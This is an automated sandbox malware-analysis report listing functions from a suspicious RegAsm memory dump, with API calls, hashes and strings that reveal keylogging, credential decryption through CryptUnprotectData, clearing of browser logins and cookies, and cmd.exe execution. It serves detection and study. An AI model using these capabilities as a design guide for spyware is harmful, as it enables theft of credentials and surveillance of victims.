                                                  • Opcode ID: 835af189ca981617db22efa5ec6b45afe77894dc59cba662e28b480f06d20bf8
                                                  • Instruction ID: 4bcbbea8953a56f0834a7592719eb704c83d71ae81c48fe005db4fd1b538d991
                                                  • Opcode Fuzzy Hash: 835af189ca981617db22efa5ec6b45afe77894dc59cba662e28b480f06d20bf8
                                                  • Instruction Fuzzy Hash: 88114272404118AACB19AB96EC55CFE77BCEE48315B00012FF506A61D1FF7C5A45C6AD
                                                  Function 0040AF29 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 65threadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 0040B19F: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B1AD
                                                    • Part of subcall function 0040B19F: wsprintfW.USER32 ref: 0040B22E
                                                    • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                  • CreateThread.KERNEL32(00000000,00000000,Function_0000A2A2,?,00000000,00000000), ref: 0040AFA9
                                                  • CreateThread.KERNEL32(00000000,00000000,Function_0000A2C4,?,00000000,00000000), ref: 0040AFB5
                                                  • CreateThread.KERNEL32(00000000,00000000,0040A2D0,?,00000000,00000000), ref: 0040AFC1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateThread$LocalTime$wsprintf
                                                  • String ID: Online Keylogger Started
                                                  • API String ID: 112202259-1258561607
                                                  • Opcode ID: 3c1e5f1726eb6ad3dfbc213d1afd6b44996bcee0f74f9eb9af7ab1802c39fff0
                                                  • Instruction ID: 1fd114496b08e8c1d91a2f23279a740fccf8855fe00c80ef0b78f2cd7c44f0e8
                                                  • Opcode Fuzzy Hash: 3c1e5f1726eb6ad3dfbc213d1afd6b44996bcee0f74f9eb9af7ab1802c39fff0
                                                  • Instruction Fuzzy Hash: 2A01C4A07003193EE62076368C8BDBF7A6DCA91398F4004BFF641362C2E97D1C1586FA
                                                  Function 00406A9E Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53libraryloaderCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • LoadLibraryA.KERNEL32(crypt32,CryptUnprotectData), ref: 00406ABD
                                                  • GetProcAddress.KERNEL32(00000000), ref: 00406AC4
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressLibraryLoadProc
                                                  • String ID: CryptUnprotectData$crypt32
                                                  • API String ID: 2574300362-2380590389
                                                  • Opcode ID: 905686a6130e311fdcec2a0cd22c75bab7e39712089f0cc697143e337071fc99
                                                  • Instruction ID: 59ed3cbb63f31e38ea488d6bd85f24bb9ff1ce5495ed4d1509158228521d53cd
                                                  • Opcode Fuzzy Hash: 905686a6130e311fdcec2a0cd22c75bab7e39712089f0cc697143e337071fc99
                                                  • Instruction Fuzzy Hash: 2C01B975604216BBCB18CFAD9D449AF7BB4AB45300B00417EE956E3381DA74E9008B95
                                                  Function 0040515C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46synchronizationCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00405159), ref: 00405173
                                                  • CloseHandle.KERNEL32(?), ref: 004051CA
                                                  • SetEvent.KERNEL32(?), ref: 004051D9
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseEventHandleObjectSingleWait
                                                  • String ID: Connection Timeout
                                                  • API String ID: 2055531096-499159329
                                                  • Opcode ID: 9f6ecd509c0a7bd309a8898773f2a48374a0d847cbc707063012ebd492618a2f
                                                  • Instruction ID: b176daa04f7f78a72cd0d213bf0bcd41e0e3849ccec9e2477ca34bbc74fb9340
                                                  • Opcode Fuzzy Hash: 9f6ecd509c0a7bd309a8898773f2a48374a0d847cbc707063012ebd492618a2f
                                                  • Instruction Fuzzy Hash: C901F530940F00AFD7216B368D8642BBFE0EF00306704093EE68356AE2D6789800CF89
                                                  Function 0040E800 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 45COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E86E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Exception@8Throw
                                                  • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                  • API String ID: 2005118841-1866435925
                                                  • Opcode ID: 393980db8800f491ea7c1a59f80fc085f11d752c19bfb05bf36f8e27219a3784
                                                  • Instruction ID: 287a1f786264602a2f100ba68ee8cd07dacd1bfc9ef62352ff5e55a88b78f620
                                                  • Opcode Fuzzy Hash: 393980db8800f491ea7c1a59f80fc085f11d752c19bfb05bf36f8e27219a3784
                                                  • Instruction Fuzzy Hash: 59018F626583087AEB14B697CC03FBA33685B10708F10CC3BBD01765C2EA7D6A61C66F
                                                  Function 0041384F Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39registryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • RegCreateKeyW.ADVAPI32(80000001,00000000,004752D8), ref: 0041385A
                                                  • RegSetValueExW.ADVAPI32(004752D8,?,00000000,00000001,00000000,00000000,004752F0,?,0040F85E,pth_unenc,004752D8), ref: 00413888
                                                  • RegCloseKey.ADVAPI32(004752D8,?,0040F85E,pth_unenc,004752D8), ref: 00413893
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseCreateValue
                                                  • String ID: pth_unenc
                                                  • API String ID: 1818849710-4028850238
                                                  • Opcode ID: 5c236e770f027b7b6dfc699725bd7ba66defa52264e3e321846078cfa9e8a7ba
                                                  • Instruction ID: 9133f253890910ff78e8f434c24b82038cc7026402723a24ca4ec17c3e6d8cb5
                                                  • Opcode Fuzzy Hash: 5c236e770f027b7b6dfc699725bd7ba66defa52264e3e321846078cfa9e8a7ba
                                                  • Instruction Fuzzy Hash: 15F0C271440218FBCF00AFA1EC45FEE376CEF00756F10452AF905A61A1E7759E04DA94
                                                  Function 0040DFE1 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0040DFEC
                                                  • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040E02B
                                                    • Part of subcall function 004356CD: _Yarn.LIBCPMT ref: 004356EC
                                                    • Part of subcall function 004356CD: _Yarn.LIBCPMT ref: 00435710
                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E051
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
                                                  • String ID: bad locale name
                                                  • API String ID: 3628047217-1405518554
                                                  • Opcode ID: 358b3f1522e08b03a3202c9f95d61a93da44700bf44d5321e5e8d61ced44f7e6
                                                  • Instruction ID: 7f9ccd90240ef42149755af47b5df127ed13e8783c268b42739d505c0e35a915
                                                  • Opcode Fuzzy Hash: 358b3f1522e08b03a3202c9f95d61a93da44700bf44d5321e5e8d61ced44f7e6
                                                  • Instruction Fuzzy Hash: 77F08131544A085AC338FA62D863DDA73B49F14358F50457FB406268D2EF78BA0CCA9D
                                                  Function 00416C68 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 33threadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateThread.KERNEL32(00000000,00000000,Function_0001D4EE,00000000,00000000,00000000), ref: 00416C82
                                                  • ShowWindow.USER32(00000009), ref: 00416C9C
                                                  • SetForegroundWindow.USER32 ref: 00416CA8
                                                    • Part of subcall function 0041CE2C: AllocConsole.KERNEL32(00475338), ref: 0041CE35
                                                    • Part of subcall function 0041CE2C: ShowWindow.USER32(00000000,00000000), ref: 0041CE4E
                                                    • Part of subcall function 0041CE2C: SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CE73
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Window$ConsoleShow$AllocCreateForegroundOutputThread
                                                  • String ID: !D@
                                                  • API String ID: 3446828153-604454484
                                                  • Opcode ID: c95d4037f996435fc130d7113ec89fe5e4aa0dd425f9b60b55efc54c96c60bf0
                                                  • Instruction ID: 9f5213224becab59645eda34593d96b16d6ada18beeab21aaf628210512d7754
                                                  • Opcode Fuzzy Hash: c95d4037f996435fc130d7113ec89fe5e4aa0dd425f9b60b55efc54c96c60bf0
                                                  • Instruction Fuzzy Hash: ECF05E70149340EAD720AB62ED45AFA7B69EB54341F01487BF909C20F2DB389C94865E
                                                  Function 00416129 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 27COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 0041616B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExecuteShell
                                                  • String ID: /C $cmd.exe$open
                                                  • API String ID: 587946157-3896048727
                                                  • Opcode ID: 6b954565fb865431a8f0571ad86dfb8a094b841cbf93f4f8f4d3cab274959172
                                                  • Instruction ID: 08f4dee505367bf09000beb2be63de5ecd082ae46aa0e0363999309db21c3e05
                                                  • Opcode Fuzzy Hash: 6b954565fb865431a8f0571ad86dfb8a094b841cbf93f4f8f4d3cab274959172
                                                  • Instruction Fuzzy Hash: 5EE0C0B0204305ABC605F675DC96CBF73ADAA94749B50483F7142A20E2EF7C9D49C65D
                                                  Function 0040B8E7 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20threadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • TerminateThread.KERNEL32(0040A2B8,00000000,004752F0,pth_unenc,0040D0F3,004752D8,004752F0,?,pth_unenc), ref: 0040B8F6
                                                  • UnhookWindowsHookEx.USER32(004750F0), ref: 0040B902
                                                  • TerminateThread.KERNEL32(Function_0000A2A2,00000000,?,pth_unenc), ref: 0040B910
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: TerminateThread$HookUnhookWindows
                                                  • String ID: pth_unenc
                                                  • API String ID: 3123878439-4028850238
                                                  • Opcode ID: e1cbc6e2d6c434028aa849536a2aaf0ad10149223ccd3897ab004e8dbc05b34a
                                                  • Instruction ID: 372ac16de24f92ae7b862ff59389ff52a9cc8b3ac2037ffe6dc6d1e564519698
                                                  • Opcode Fuzzy Hash: e1cbc6e2d6c434028aa849536a2aaf0ad10149223ccd3897ab004e8dbc05b34a
                                                  • Instruction Fuzzy Hash: 71E01272204315EFD7201F909C888667AADEE1539632409BEF6C261BB6CB7D4C54C79D
                                                  Function 0040140A Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7libraryloaderCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 00401414
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0040141B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressHandleModuleProc
                                                  • String ID: GetCursorInfo$User32.dll
                                                  • API String ID: 1646373207-2714051624
                                                  • Opcode ID: d896883a00b7c9d91a41f0e937368129b1e8cf7bb1ae53218dcc7360cef0261f
                                                  • Instruction ID: 8b26e8b19aea132afe7ec2793fcae50f4a2deac5c44528798ee909e27cd98dc2
                                                  • Opcode Fuzzy Hash: d896883a00b7c9d91a41f0e937368129b1e8cf7bb1ae53218dcc7360cef0261f
                                                  • Instruction Fuzzy Hash: 6BB092B4981740FB8F102BB0AE4EA193A25B614703B1008B6F046961A2EBB888009A2E
                                                  Function 004014AF Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7libraryloaderCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 004014B9
                                                  • GetProcAddress.KERNEL32(00000000), ref: 004014C0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressLibraryLoadProc
                                                  • String ID: GetLastInputInfo$User32.dll
                                                  • API String ID: 2574300362-1519888992
                                                  • Opcode ID: 97ca63f656fbe05ba3a699769711b358361c41ed64750357eec187df6322536e
                                                  • Instruction ID: d02e03e3b89f99dad65f23c179d95e13f318a7fd709defe56253aab8848571e2
                                                  • Opcode Fuzzy Hash: 97ca63f656fbe05ba3a699769711b358361c41ed64750357eec187df6322536e
                                                  • Instruction Fuzzy Hash: EFB092B8580300FBCB102FA0AD4E91E3A68AA18703B1008A7F441C21A1EBB888009F5F
                                                  Function 0044A084 Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: __alldvrm$_strrchr
                                                  • String ID:
                                                  • API String ID: 1036877536-0
                                                  • Opcode ID: 70c324bd787235ec34b4410bef6e6c487e79153caf11c4279a27308c3ab035ac
                                                  • Instruction ID: 8ce1af842cd152cb2b2428f5d584a25f6c9224aafe101b92c03b71ca88d34985
                                                  • Opcode Fuzzy Hash: 70c324bd787235ec34b4410bef6e6c487e79153caf11c4279a27308c3ab035ac
                                                  • Instruction Fuzzy Hash: 87A156729846829FF721CF58C8817AEBBA5FF15314F2841AFE8859B381D27C8C51C75A
                                                  Function 00456C9A Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free
                                                  • String ID:
                                                  • API String ID: 269201875-0
                                                  • Opcode ID: 439bce076e8af1f4f00d09f36dc57c4360a04deb8f32f7f303546f6c5063276e
                                                  • Instruction ID: 6f8591e81a910498abf0b0e408487d1c0faf04506bf4bd3dd9e850377c22d226
                                                  • Opcode Fuzzy Hash: 439bce076e8af1f4f00d09f36dc57c4360a04deb8f32f7f303546f6c5063276e
                                                  • Instruction Fuzzy Hash: 34413931B00104AAEB207B7A9C4666F3AB5DF45735F570A1FFD28C7293DA7C481D426A
                                                  Function 00442851 Relevance: 6.1, APIs: 4, Instructions: 133COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 423e02715d989b220add50ecbde53982322c6e48bca96a6cd7fe69295545b5c8
                                                  • Instruction ID: b0a34e1ed6630e1fb57c9e62860a3601010315cd62f19612bff23542d182db60
                                                  • Opcode Fuzzy Hash: 423e02715d989b220add50ecbde53982322c6e48bca96a6cd7fe69295545b5c8
                                                  • Instruction Fuzzy Hash: 70412AB1600704BFE724AF79CD41B5EBBE8EB88714F10462FF145DB281E3B999058798
                                                  Function 00404CC3 Relevance: 6.1, APIs: 4, Instructions: 121synchronizationthreadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,00474F50), ref: 00404DB3
                                                  • CreateThread.KERNEL32(00000000,00000000,?,00474EF8,00000000,00000000), ref: 00404DC7
                                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000), ref: 00404DD2
                                                  • CloseHandle.KERNEL32(?,?,00000000), ref: 00404DDB
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                                  • String ID:
                                                  • API String ID: 3360349984-0
                                                  • Opcode ID: 3cc4a22492a47db64547c4b8535c962fb2b7a00fbf8ffb9522a706fb9bc5eda2
                                                  • Instruction ID: 30d48123e17294c38ae6f490953f1b42a5ca81467cb0df1087f173bd09261e59
                                                  • Opcode Fuzzy Hash: 3cc4a22492a47db64547c4b8535c962fb2b7a00fbf8ffb9522a706fb9bc5eda2
                                                  • Instruction Fuzzy Hash: 684182B1108301AFC714EB62CD55DBFB7EDAFD4314F40093EF992A22E1DB3899098666
                                                  Function 0040C047 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 103sleepCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  • [Cleared browsers logins and cookies.], xrefs: 0040C11F
                                                  • Cleared browsers logins and cookies., xrefs: 0040C130
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Sleep
                                                  • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                                                  • API String ID: 3472027048-1236744412
                                                  • Opcode ID: af2c2d963010d4b9fe0ed32b7540b86f028afa125e63126aea6004068ef018c7
                                                  • Instruction ID: 5a72b8a34604a64e244bad04561a930bad76f77e78bf22f3e088d6afb7384554
                                                  • Opcode Fuzzy Hash: af2c2d963010d4b9fe0ed32b7540b86f028afa125e63126aea6004068ef018c7
                                                  • Instruction Fuzzy Hash: A431A805648381EDD6116BF514967AB7B824A53748F0882BFB8C4373C3DA7A4808C79F
                                                  Function 0040A564 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 71sleepCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 0041C5E2: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041C5F2
                                                    • Part of subcall function 0041C5E2: GetWindowTextLengthW.USER32(00000000), ref: 0041C5FB
                                                    • Part of subcall function 0041C5E2: GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0041C625
                                                  • Sleep.KERNEL32(000001F4), ref: 0040A5AE
                                                  • Sleep.KERNEL32(00000064), ref: 0040A638
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Window$SleepText$ForegroundLength
                                                  • String ID: [ $ ]
                                                  • API String ID: 3309952895-93608704
                                                  • Opcode ID: f02f1a0373de4d905e268f57495fa08b349ea431ac4d969b5d726f466b44a1dd
                                                  • Instruction ID: 6255842b65d5da3793f092b3f1447ea5db7efb23f61c0c2d19f8aa6a86066f85
                                                  • Opcode Fuzzy Hash: f02f1a0373de4d905e268f57495fa08b349ea431ac4d969b5d726f466b44a1dd
                                                  • Instruction Fuzzy Hash: CB119F315143006BC614BB26CC579AF77A8AB90348F40083FF552661E3EF79AE18869B
                                                  Function 00443AD3 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 911473749be2fa5c2776252735adb4f144d6ecb150fd6d6ba7d991cf4941a2f5
                                                  • Instruction ID: 2af8e1c260e5220142bf0b5f8a7e988c949d9a3a1697e0ff4d6bcf25ce69da1b
                                                  • Opcode Fuzzy Hash: 911473749be2fa5c2776252735adb4f144d6ecb150fd6d6ba7d991cf4941a2f5
                                                  • Instruction Fuzzy Hash: 7E01F2B26093557EFA202E786CC2F67630DCB51FBAB31033BB520612D2DB68DD40452C
                                                  Function 00443B52 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b7286f010cda03a875959cf2de4cc99ef12f7635f3b898eb143771747277d2a1
                                                  • Instruction ID: 437de9af4247593539f95cdbb70b1dc5411192884b5f12beac7b10196549b189
                                                  • Opcode Fuzzy Hash: b7286f010cda03a875959cf2de4cc99ef12f7635f3b898eb143771747277d2a1
                                                  • Instruction Fuzzy Hash: CB01ADB26096527ABA202E796CC5E27634CDB42BBA335037BF821512E3DF68DE054169
                                                  Function 004485E6 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,0044858D,00000000,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue), ref: 00448618
                                                  • GetLastError.KERNEL32(?,0044858D,00000000,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue,0045F170,0045F178,00000000,00000364,?,00448367), ref: 00448624
                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0044858D,00000000,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue,0045F170,0045F178,00000000), ref: 00448632
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: LibraryLoad$ErrorLast
                                                  • String ID:
                                                  • API String ID: 3177248105-0
                                                  • Opcode ID: 8f9b5e85c90ff7ccd8dc2bf5dda10acfb836c822a6cf5ef36d60eb5c9189937f
                                                  • Instruction ID: 239c22332ac31c5199b3ba4764290be2907fca328f5d1df1ca03bb1201a614b6
                                                  • Opcode Fuzzy Hash: 8f9b5e85c90ff7ccd8dc2bf5dda10acfb836c822a6cf5ef36d60eb5c9189937f
                                                  • Instruction Fuzzy Hash: D401FC32602322EBDB618A78EC4495F7758AF15BA2B22093AF909D3241DF24DC01C6EC
                                                  Function 0041C516 Relevance: 6.0, APIs: 4, Instructions: 50fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A87E), ref: 0041C52F
                                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 0041C543
                                                  • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0041C568
                                                  • CloseHandle.KERNEL32(00000000), ref: 0041C576
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$CloseCreateHandleReadSize
                                                  • String ID:
                                                  • API String ID: 3919263394-0
                                                  • Opcode ID: eaf6ed3f63b4403b43378431095bcec12dbe7b76bb0b9555606dcebd0a0bb3a0
                                                  • Instruction ID: 4673af35f3eeaf13de89ae80f5e83caf65f56e40ae5cb47f4621101913e6d1ef
                                                  • Opcode Fuzzy Hash: eaf6ed3f63b4403b43378431095bcec12dbe7b76bb0b9555606dcebd0a0bb3a0
                                                  • Instruction Fuzzy Hash: 50F0C2B1241318BFE6101B25ADC9EBB369DDB866A9F10063EF802A22D1DA698D055139
                                                  Function 0041C26E Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
                                                  • OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C299
                                                  • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041C2C4
                                                  • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041C2CC
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseHandleOpenProcess
                                                  • String ID:
                                                  • API String ID: 39102293-0
                                                  • Opcode ID: e1074fac5642d3b73ea46f905cbac139ffb473db2c7b30d838fbef5372722d9f
                                                  • Instruction ID: 82f86893bb8475317186349f6084970b7a3011258d8579340058f5d8518f4318
                                                  • Opcode Fuzzy Hash: e1074fac5642d3b73ea46f905cbac139ffb473db2c7b30d838fbef5372722d9f
                                                  • Instruction Fuzzy Hash: 9C01F231680215ABD61066949C8AFA7B66C8B84756F0001ABFA08D22A2EF74CD81466A
                                                  Function 004398E3 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • ___BuildCatchObject.LIBVCRUNTIME ref: 004398FA
                                                    • Part of subcall function 00439F32: ___AdjustPointer.LIBCMT ref: 00439F7C
                                                  • _UnwindNestedFrames.LIBCMT ref: 00439911
                                                  • ___FrameUnwindToState.LIBVCRUNTIME ref: 00439923
                                                  • CallCatchBlock.LIBVCRUNTIME ref: 00439947
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
